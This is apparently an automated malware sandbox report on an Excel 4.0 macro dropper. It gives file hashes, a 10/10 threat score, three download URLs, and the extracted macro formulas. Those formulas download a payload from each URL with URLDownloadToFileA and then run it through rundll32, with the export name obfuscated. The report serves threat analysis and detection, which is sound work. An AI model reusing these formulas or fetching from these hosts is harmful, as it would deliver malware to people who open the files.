General

  • Target

    ?i=1xmougxeb

  • Size

    83KB

  • Sample

    220519-cdhf6shbf5

  • MD5

    a19739c3b8b42e530b0c39885a7eb572

  • SHA1

    034d7b56335bc65f1010c24801f40f739f981418

  • SHA256

    689555499fd2dff9a85acca987cf63ecb004150fb9428e7336b11a90eed8a4a6

  • SHA512

    30cda33c13a7c5cbee38fc74846b6263ca20efc53434577855032e59f1e4376675d9f46b804e61964713d91fe7af8f9bcd3ffe010ebeec4461e45c38ea6c7238

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://therecyclingmachine.com/wp-admin/LzpOZSlkq90fYT1/

http://zhongmaifangwu.com/TEST777/3U4Un0u/

http://chicagocloudgroup.com/wp-content/updraft/OKXV/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://therecyclingmachine.com/wp-admin/LzpOZSlkq90fYT1/","..\erum.ocx",0,0) =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://zhongmaifangwu.com/TEST777/3U4Un0u/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://chicagocloudgroup.com/wp-content/updraft/OKXV/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://therecyclingmachine.com/wp-admin/LzpOZSlkq90fYT1/

xlm40.dropper

http://zhongmaifangwu.com/TEST777/3U4Un0u/

xlm40.dropper

http://chicagocloudgroup.com/wp-content/updraft/OKXV/

Targets

    • Target

      ?i=1xmougxeb

    • Size

      83KB

    • MD5

      a19739c3b8b42e530b0c39885a7eb572

    • SHA1

      034d7b56335bc65f1010c24801f40f739f981418

    • SHA256

      689555499fd2dff9a85acca987cf63ecb004150fb9428e7336b11a90eed8a4a6

    • SHA512

      30cda33c13a7c5cbee38fc74846b6263ca20efc53434577855032e59f1e4376675d9f46b804e61964713d91fe7af8f9bcd3ffe010ebeec4461e45c38ea6c7238

    Score
    10/10

MITRE ATT&CK Enterprise v6

Tasks